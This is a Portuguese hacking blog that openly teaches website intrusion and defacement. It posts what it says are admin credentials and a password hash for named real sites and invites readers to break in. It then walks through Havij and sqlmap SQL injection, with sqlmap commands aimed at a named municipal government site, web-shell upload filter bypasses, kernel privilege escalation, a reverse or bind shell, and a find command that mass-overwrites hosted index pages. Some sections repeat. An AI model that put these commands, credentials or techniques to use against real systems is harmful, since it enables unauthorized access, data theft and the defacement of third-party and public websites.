primeiro site pra galera como prometido'
obs: eu não vou invadir os sites isso fika por conta de vcs eu pego o admin e senha e vcs se divertão ;)
site:www.dkggroup.com/main.php?id=121
db:+---------------+
| sessions |
| uvp_Languages |
| uvp_Pages |
| uvp_Users |
+---------------+
password:+----------------------------------+
| Password |
+----------------------------------+
| 462d9cebb6479dbf66d1b965b10181a7 | senha cript md5
+----------------------------------+
username : admin
bom como prometido aki ta mais um site vull
http://www.les-echecs.com/administration/
login: meilhak
senha: processeur
só logar e se divertir *-*
OUTROO
http://www.elcoma.com.br/
LOGIN : ADM
SENHA : 192cc121f8b612ffc614bcfc62528339
segunda-feira, 28 de janeiro de 2013
..:::COMO USAR O HAVIJ:::..
BLLZ GALERA
bom hooj ' vou mostar como usar o havij pra escaniar sites ! porem o havij é uma ferramenta muito fraca ' pelo menos eu acho ..
abre o google e joga umas deessas dorks no google
about.php?cartID=
bom depois de achar o site vull abre o havij e coloca o site que vc escolheu em TARGET e aperte em ANALIZE depois de uns 20 segundos o havij vai te da a DB do site então vc vai em TABLES ai vai em GET TABLES e vai começa ANALIZA as TABELAS do site ai escolhe uma tables e clica em GET COLUMNS vc tenq achar uma coluna mais u menos assim USUARIO E SENHA ai clica em GET DATA ai vai te dar o login e senha do site .
AI VC PERGUNTA EA PAGINA DE ADMIN CALMA O HAVIJ TEM UMA FERRAMENTA PRA ACHAR A PAGINA DE ADMIN VC PRECISA IR EM " find admin" la vc coloca o site e talvez acha a pagina de admin do site..
PRONTO É ISSO !! BY LUC4S - DEFACE
bom hooj ' vou mostar como usar o havij pra escaniar sites ! porem o havij é uma ferramenta muito fraca ' pelo menos eu acho ..
abre o google e joga umas deessas dorks no google
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
OBS: NÃO ACHEI O LINK PRA BAIXAR ELE EU TENHO FAZ UM TEMPO JÁÁ !! DESCULPA !
Aqui tem mais dorks
http://pastebin.com/iAA7PtnwOBS: NÃO ACHEI O LINK PRA BAIXAR ELE EU TENHO FAZ UM TEMPO JÁÁ !! DESCULPA !
Aqui tem mais dorks
bom depois de achar o site vull abre o havij e coloca o site que vc escolheu em TARGET e aperte em ANALIZE depois de uns 20 segundos o havij vai te da a DB do site então vc vai em TABLES ai vai em GET TABLES e vai começa ANALIZA as TABELAS do site ai escolhe uma tables e clica em GET COLUMNS vc tenq achar uma coluna mais u menos assim USUARIO E SENHA ai clica em GET DATA ai vai te dar o login e senha do site .
AI VC PERGUNTA EA PAGINA DE ADMIN CALMA O HAVIJ TEM UMA FERRAMENTA PRA ACHAR A PAGINA DE ADMIN VC PRECISA IR EM " find admin" la vc coloca o site e talvez acha a pagina de admin do site..
PRONTO É ISSO !! BY LUC4S - DEFACE
sábado, 26 de janeiro de 2013
..:::ALGUMAS SHELL:::..
Ai galera um site com algumas Shell pra se divertir http://www.r57.gen.tr/ tem varias shells aii !!
( use com moderação ) ;)
( use com moderação ) ;)
..::coisas sobre deface::..
Primeiro vou encinar a fazer o MASS DEFACE >
Antes, é necessário saber de algumas coisas: em um servidor, os sites são divididos entre usuários. Cada usuário tem permissões para realizar ações (chmod) nos diretórios que lhe é aplicado.
Claro que você consegue, apesar de bem raro, encontrar servidores onde você tem privilégios em todos os sites ali hospedados, mas em geral isto não ocorre.
Mas há um usuário que possui todos os privilégios: o root.
O que aqui veremos é utilizado logo após a exploração de uma vulnerabilidade e upload de shell. Use sua predileta, como SymbShell, C99 etc.
Vamos primeiramente descobrir que versão de Kernel está rodando ali. Então, vamos rodar o comando (bash):
Várias shells (inclusive as duas citadas aqui) conseguem executar
comandos. Você também pode executá-los pelo PHP usando funções como shell_exec() e system().
Com a versão do Kernel em mãos, vamos ver se já há exploits (XPL) para ter o acesso root. Estes são exploits específicos para escalar privilégios, e são também chamados de “local root exploit” ou “local script”. Você consegue encontrar esses exploits em sites como Remote-Injection, exploit-db, inj3ct0r e até mesmo no Google. Vamos usar, por exemplo, este aqui.
Claro que as versões mais recentes do kernel não possuem XPL’s ainda.
A maioria dos XPL’s são desenvolvidos em C. Por isso, após baixar o seu exploit, você deverá compilá-lo. Você pode utilizar o gcc se usa Linux, mas há vários para Windows.
Com o arquivo compilado em mãos, utilize sua shell para enviá-lo ao servidor. Agora, vamos usar uma função existente na maioria das shells de fazer a conexão por seu terminal de comandos (ou M$-DOS) – Bind Shell Backdoor. Conecte-se à sua maneira, podendo ser via conexão reversa (minha predileta) ou direta.
Feito isso, você provavelmente estará com seu terminal ou CMD conectado ao servidor, usando telnet ou netcat. Agora, ainda no terminal, execute o seu XPL, usando ./nome-do-arquivo. Após exercer sua função (escalar privilégios), o XPL fechará automaticamente, voltando o sistema à recepção de seus comandos. Vamos ver se conseguimos. Digite o comando ‘id’ e confira se o resultado (segunda linha) foi parecido com esse:
Se isso ocorreu, você já é root. Navegue pelos arquivos mais
importantes do servidor. Você “poderá” fazer qualquer coisa ali,
inclusive nosso mass deface prometido.
Mass deface significa “desfiguração em massa”, e nada mais é do que ownar todos os sites hospedados naquele servidor.
Primeiramente vamos ver quais sites iremos atacar. Vamos utilizar o serviço fornecido pelo On The Same Host (lembrando que ele não é o único que faz isso). Ali digitamos o endereço do site em que upamos a shell (exemplo: site.com.br – sem o WWW). Vemos algumas informações e a lista com todos os sites ali hospedados.
Então, agora é a melhor parte da história. Envie sua defacepage para o servidor usando sua Web Shell e guarde o caminho físico completo dela. Por exemplo:
/home/***/public_html/defacepage.html
D:\Inetpub\***\public_html\defacepage.html
Saiba também o diretório onde estão os sites hospedados. Podem estar em /var/www, /home/, enfim, varia muito de servidor para servidor. Mas use o bom-senso e fica fácil encontrá-lo.
Simplesmente volte ao seu terminal e rode:
Por exemplo: se os sites hospedados estão em /home/ e sua defacepage em /home/site.com/public_html/defacepage.html você fará:
Agora, visite um dos sites que vimos no On The Same Host e veja sua maravilhosa defacepage.
Você também pode utilizar scripts automáticos de mass deface no lugar do find, como este aqui. Entre as vantagens, estão algumas estatísticas do seu deface. Para isso, basta upá-lo pela web shell e executá-lo pelo terminal logo após escalar privilégios.
Até logo!
COMOO FAZER UM DEFACE COM SEGURANÇA>
Para ganhar o anonimato na rede, utilizamos Proxy, Tunnel/Tunneling e Mac Mascarada.
Irei citar aqui alguns tópicos como referência:
Proxy:
Por que usar Proxy?
Simples, ele praticamente "muda" seu ip, tornando mais difícil sua localização.
Tunnel/Tunniling:
Porque usar Tunnel?
Idem ao proxy, pois você acessa outros sites via o site do tunnel, sendo assim, tendo o IP "trocado".
Bom, a vários pela rede. O que irei citar é:
www.freetoview.net
Se alguem tiver mais algum para a lista só postar que edito e acrescento.
Se quizer mais tunnel para acesso, use o google para procura.
Mascarar a Mac:
Porque Mascarar a Mac?
Mac, o que vem a ser Mac?
Mac é o endereço físico de seu computador, é a impressão digital dele (=P), tendo acesso a ela, obviamente tera acesso a seu PC.
Como mascarar sua Mac
Seguindo tais procedimentos, vc estara protegido, não 100%, mas com uma porcetagem boa de segurança. Obviamente que se invadido algum site governamental, de bancos e etc, o risco de sua localização é maior.
Usem com moderação.
Antes, é necessário saber de algumas coisas: em um servidor, os sites são divididos entre usuários. Cada usuário tem permissões para realizar ações (chmod) nos diretórios que lhe é aplicado.
Claro que você consegue, apesar de bem raro, encontrar servidores onde você tem privilégios em todos os sites ali hospedados, mas em geral isto não ocorre.
Mas há um usuário que possui todos os privilégios: o root.
O que aqui veremos é utilizado logo após a exploração de uma vulnerabilidade e upload de shell. Use sua predileta, como SymbShell, C99 etc.
Vamos primeiramente descobrir que versão de Kernel está rodando ali. Então, vamos rodar o comando (bash):
Código:
uname -a
Com a versão do Kernel em mãos, vamos ver se já há exploits (XPL) para ter o acesso root. Estes são exploits específicos para escalar privilégios, e são também chamados de “local root exploit” ou “local script”. Você consegue encontrar esses exploits em sites como Remote-Injection, exploit-db, inj3ct0r e até mesmo no Google. Vamos usar, por exemplo, este aqui.
Claro que as versões mais recentes do kernel não possuem XPL’s ainda.
A maioria dos XPL’s são desenvolvidos em C. Por isso, após baixar o seu exploit, você deverá compilá-lo. Você pode utilizar o gcc se usa Linux, mas há vários para Windows.
Com o arquivo compilado em mãos, utilize sua shell para enviá-lo ao servidor. Agora, vamos usar uma função existente na maioria das shells de fazer a conexão por seu terminal de comandos (ou M$-DOS) – Bind Shell Backdoor. Conecte-se à sua maneira, podendo ser via conexão reversa (minha predileta) ou direta.
Feito isso, você provavelmente estará com seu terminal ou CMD conectado ao servidor, usando telnet ou netcat. Agora, ainda no terminal, execute o seu XPL, usando ./nome-do-arquivo. Após exercer sua função (escalar privilégios), o XPL fechará automaticamente, voltando o sistema à recepção de seus comandos. Vamos ver se conseguimos. Digite o comando ‘id’ e confira se o resultado (segunda linha) foi parecido com esse:
Código:
root@***:/home/***/public_html# id
uid=0(root) gid=0(root) grupos=0(root)
Mass deface significa “desfiguração em massa”, e nada mais é do que ownar todos os sites hospedados naquele servidor.
Primeiramente vamos ver quais sites iremos atacar. Vamos utilizar o serviço fornecido pelo On The Same Host (lembrando que ele não é o único que faz isso). Ali digitamos o endereço do site em que upamos a shell (exemplo: site.com.br – sem o WWW). Vemos algumas informações e a lista com todos os sites ali hospedados.
Então, agora é a melhor parte da história. Envie sua defacepage para o servidor usando sua Web Shell e guarde o caminho físico completo dela. Por exemplo:
/home/***/public_html/defacepage.html
D:\Inetpub\***\public_html\defacepage.html
Saiba também o diretório onde estão os sites hospedados. Podem estar em /var/www, /home/, enfim, varia muito de servidor para servidor. Mas use o bom-senso e fica fácil encontrá-lo.
Simplesmente volte ao seu terminal e rode:
Código:
find /diretorio-onde-estao-os-sites-hospedados/ -name "index.*" -exec cp caminho-da-sua-defacepage {} \;
Código:
find /home/ -name "index.*" -exec cp /home/site.com/public_html/defacepage.html {} \;
Você também pode utilizar scripts automáticos de mass deface no lugar do find, como este aqui. Entre as vantagens, estão algumas estatísticas do seu deface. Para isso, basta upá-lo pela web shell e executá-lo pelo terminal logo após escalar privilégios.
Até logo!
COMOO FAZER UM DEFACE COM SEGURANÇA>
Para ganhar o anonimato na rede, utilizamos Proxy, Tunnel/Tunneling e Mac Mascarada.
Irei citar aqui alguns tópicos como referência:
Proxy:
Por que usar Proxy?
Simples, ele praticamente "muda" seu ip, tornando mais difícil sua localização.
Tunnel/Tunniling:
Porque usar Tunnel?
Idem ao proxy, pois você acessa outros sites via o site do tunnel, sendo assim, tendo o IP "trocado".
Bom, a vários pela rede. O que irei citar é:
www.freetoview.net
Se alguem tiver mais algum para a lista só postar que edito e acrescento.
Se quizer mais tunnel para acesso, use o google para procura.
Mascarar a Mac:
Porque Mascarar a Mac?
Mac, o que vem a ser Mac?
Mac é o endereço físico de seu computador, é a impressão digital dele (=P), tendo acesso a ela, obviamente tera acesso a seu PC.
Como mascarar sua Mac
Seguindo tais procedimentos, vc estara protegido, não 100%, mas com uma porcetagem boa de segurança. Obviamente que se invadido algum site governamental, de bancos e etc, o risco de sua localização é maior.
Usem com moderação.
quinta-feira, 17 de janeiro de 2013
SQL INJETION - DEFACE
Bom,Primeiro passo é encontrar um Site Vulnerável. E pra isso Usaremos DORKS
DORKS,são endereços aos quais você associa ao Google,Procurando sites Vulneráveis!
LISTA DE 7 MIL DORKS http://pastebin.com/iAA7Ptnw
DORKS,são endereços aos quais você associa ao Google,Procurando sites Vulneráveis!
LISTA DE 7 MIL DORKS http://pastebin.com/iAA7Ptnw
Após abrir um site,depois de Jogar algumas dessas DORKS no Google,Você Vai ter que "Testar" Pra ver se o link é vulnerável;
Para isso você vai por o sinal de aspas (') no final da URL.Se for Vulnerável você vai se deparar com um erro,
Parecido
com esse ( You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ''' at line 1 )
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bom achamos um Site Vulnerável...
Agora vamos para o SQLMAP
1° Baixe o SQLMAP
link: http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.zip/download
Extraia o arquivo, Para o C: (Para mim fica mais fácil).
Após baixar e Extrair,baixe o Python 2.7: (Necessário para rodar o SqlMap)
Após ter Instalado o python 2.7.vamos Usar o SQLMAP!
Se você extraiu o sqlmap para o C: ,usaremos os Seguintes Comandos com o Prompt De Comando. (Comandos Grifados)
C:\Documents and Settings\Admin>cd \
C:\>cd sqlmap
C:\sqlmap>sqlmap.py
-u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 --dbs (esse
comando "--dbs" listará as DBS existentes)
Após isso vai aparecer, as DBS existentes.
----
[*] information_schema
[*] siteubt
[*] test
----
Ok,temos as DBS;eu costumo ir marcando tudo em um txt.
Agora vamos Procurar a DB que o site está usando,usaremos o seguinte comando.
C:\sqlmap>sqlmap.py
-u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 --current-db
(esse comando "--current-db" vai listar a DB que o site esta usando.
---
current database: 'siteubt'
---
Pronto sabemos que a DB que está sendo suada é siteubt
Agora vamos Listar as tabelas existentes nessa DB,então usaremos o seguinte comando.
C:\sqlmap>sqlmap.py
-u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D siteubt
--tables (esse comando "-D siteubt --tables","-D" especifica a DB e
"--tables" vai listar as tabelas.
+-----------------+
| a3_questionario |
| agenda |
| agentes |
| anexos |
| brinq_cad |
| brinq_freq |
| cad_edital |
| cad_edital2 |
| ccz |
| concurso |
| concurso2 |
| concurso_emdurb |
| dias |
| documento |
| dperiodo |
| esportes |
| falacidadao |
| foto |
| foto_hab |
| foto_pag |
| foto_san |
| fotos |
| frotas |
| galeriafotos |
| guiasn |
| infoccz |
| issretencao |
| itbi |
| licit |
| log_setor |
| login |
| login2 |
| logs |
| luos |
| menu |
| noticias |
| notluos |
| obras |
| pagina |
| pbairros |
| pcidade |
| pescola |
| pfamilias |
| pidoso |
| pidososinfo |
| pmedicamento |
| pmedutil |
| pmhis |
| pmsb |
| pservsaude |
| pssaudeutil |
| rh1 |
| rh2 |
| secretarias |
| servicosocial |
| tipo |
| tipo2 |
| tipo_hab |
| viaiptu |
+-----------------+
Pronto,ai
temos as tabelas, Agora partir dai procuraremos uma tabela que seja de
nosso interesse,como exemplo, uma que podemos usar para Logar no
site,digamos,coisas preciosas... No caso vemos ali 3 tabelas que podem
sem do nosso interesse.
---
log_setor
login
login2
---
Bom agora vamos listar as tabelas,e vamos ver as colunas que tem nelas,Usaremos o seguinte comando.
C:\sqlmap>sqlmap.py
-u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D siteubt -T
login --columns (esse comando irá listar as colunas dentro da tabela
"login")
Nos deparamos Com as seguintes colunas.
+----------+-------------------------------+
| Column | Type |
+----------+-------------------------------+
| codlogin | mediumint(8) unsigned |
| login | varchar(100) |
| senha | varchar(120) |
+----------+-------------------------------+
login
e senha...iremos dar um DUMP neles....Então usaremos o seguinte
comando.(Lembrando que eu vou anotando todos os resultados que consigo
em todo esse procedimento)
C:\sqlmap>sqlmap.py
-u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D siteubt -T
login -C login,senha --dump (esse comando "--dump" mostrara os
resultados que tanto queremos '-' )
Se você quer explorar muito o site,dump em todas as tabelas de todas as DBs =D
Bom nesse procedimento usamos os Seguintes comandos...
***COMANDOS***
sqlmap.py --url *************** --dbs
sqlmap.py --url *************** --current-db
sqlmap.py --url *************** -D 'databasedosite' --tables
sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite' --columns
sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite" -C 'colunasdosite' --dump
************ é o site que você vai invadir
Nas colunas não se esqueça de separar por , [virgula] ex. usuario,senha --dump
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Ok,por
exemplo,se conseguirmos Logins e senhas de administradores do
site,vamos precisar,Procurar uma area de LOGIN para efetuar o deface. Eu
uso o ACUNETIX pois ele lista as pastas que estão no site.
LINK: http://www.acunetix.com/vulnerability-scanner/download.htm
OBS:
Acunetix é bom que ele é uma ferramenta que procura falhas no site,com
sorte,você pode encontrar diversas falhas escaneando um site com o
acunetix.
Ok,após
logarmos no site,o que temos a fazer,e encontrar uma área de Upload,e
fazer upload de nossa shell...Com a shell podemos alterar o site.
Certos
sites,recusam fazer upload de arquivos .php , Como a shell é .php ,
temos que burlar o upload, faremos da shell, JPG, como se fosse imagem,o
que tem que fazer é mudar de .php para .php.jpg , assim taremos upando a
shell como imagem.
Existem várias formas de se burlar sistemas de upload de imagens em sites.
Nesse tutorial vou explicar os mais conhecidos métodos e é claro, os melhores métodos.
O
porque de nós querermos burlar o sistema, é facil, nós queremos burlar
ou para colocar um outro tipo de extensão ou ter algum privilégio no
site ou no servidor onde ele está hospedado.
Para
termos algum tipo de privilégio, nós teremos que upar uma shell, no
caso em PHP ou em C, que será demonstrado nesse tutorial.
Quando
você vai upar uma shell em PHP em um sistema de upload de imagens .jpg,
ele através do filtro de extensões, ele vai te dar um aviso de que não é
possível fazer upload desse arquivo.
O que temos que fazer é descobrir porque ele não nos dá essa permissão.
A
primeira coisa que temos que verificar é se ele pega apenas a primeira
extensão depois do primeiro ponto (.), por isso iremos tentar upar nossa
shell da seguinte forma renomeando o arquivo:
Exemplo:
minhashell.jpg.php
Assim ele seria reconhecido como um arquivo PHP, pois a real extensão é .php.
Na
maioria das vezes essa técnica funciona, mas é claro que tem sites que
não irão aceitar isso, por isso iremos tentar de outra forma.
Alguns
sites pegam apenas a última extensão do arquivo, mas apenas reconhecem a
primeira extensão depois do ponto, assim nós podemos upar a shell da
seguinte forma:
Exemplo:
minhashell.php.jpg OU minhashell.jpg.php
Assim
ele seria reconhecido como um arquivo PHP, pois a extensão real é jpg,
mas como é eliminada a segunda extensão, então ele seria renomeado pelo
filtro para um arquivo .php.
Um
outro tipo de filtro vulnerável é o filtro em que se pode anular a
última extensão através de um comando null antes da última extensão.
O arquivo renomeado ficaria assim:
Exemplo:
minhashell.php.jpg OU minhashell.jpg. php
O
filtro iria aceitar o arquivo por ele ser uma extensão .jpg, porém como
à um comando anulando a última extensão, então ele reconheceria o
arquivo como .php apenas.
A
maioria dos sistemas de upload reconhece apenas a extensão do arquivo,
mas não o tipo de arquivo, isso é muito perigoso para o servidor, pois
um arquivo pode ter uma extensão .jpg mas ser um arquivo do tipo PHP.
Com
isso o arquivo terá uma extensão .jpg e será hospedado no servidor, mas
através de um exploit, ele pode ser renomeado ou você pode modificar um
arquivo JPG com linhas em PHP com um editor hexadecimal, mas na maioria
das vezes o arquivo corrompe, ficando assim impossibilitado de seguir
qualquer comando estabelecido por você.
Outro caso é que o servidor apenas reconhece o tipo de arquivo, mas não a extensão.
Um modo de mudar essa situação é usando o edjpgcom, um software próprio para fazer esse tipo de modificação em arquivo JPG.
A primeira coisa que você vai fazer é criar um pasta chamada jpg no seu C:\ e extrair esse arquivo nessa pasta.
Agora abra o CMD (prompt de comando).
Agora dê um
Exemplo:
cd c:\jpg
Dê o seguinte comando agora:
Exemplo:
edjpgcom.exe suaimagem.jpg
Irá
aparecer uma janela e no campo de texto terá um texto, remova esse
texto e ponha sua linha de comando em PHP, que será sua shell/exploit e
salve.
Não
coloque comandos muito grandes, pois irá corromper o arquivo, ponha
apenas algumas linhas (a shell c99 não funciona nesse caso pois ela é
grande).
Agora
renomeie o arquivo para .php e faça upload pelo sistema de upload do
site e pronto, não irá mais aparecer aquele erro de "Invalid file
Dimensions".
Ou podem fazer do seguinte modo ;
Exemplo:
GIF89a;
<?php
/* r57 shell here */
?>
Assinar:
Postagens (Atom)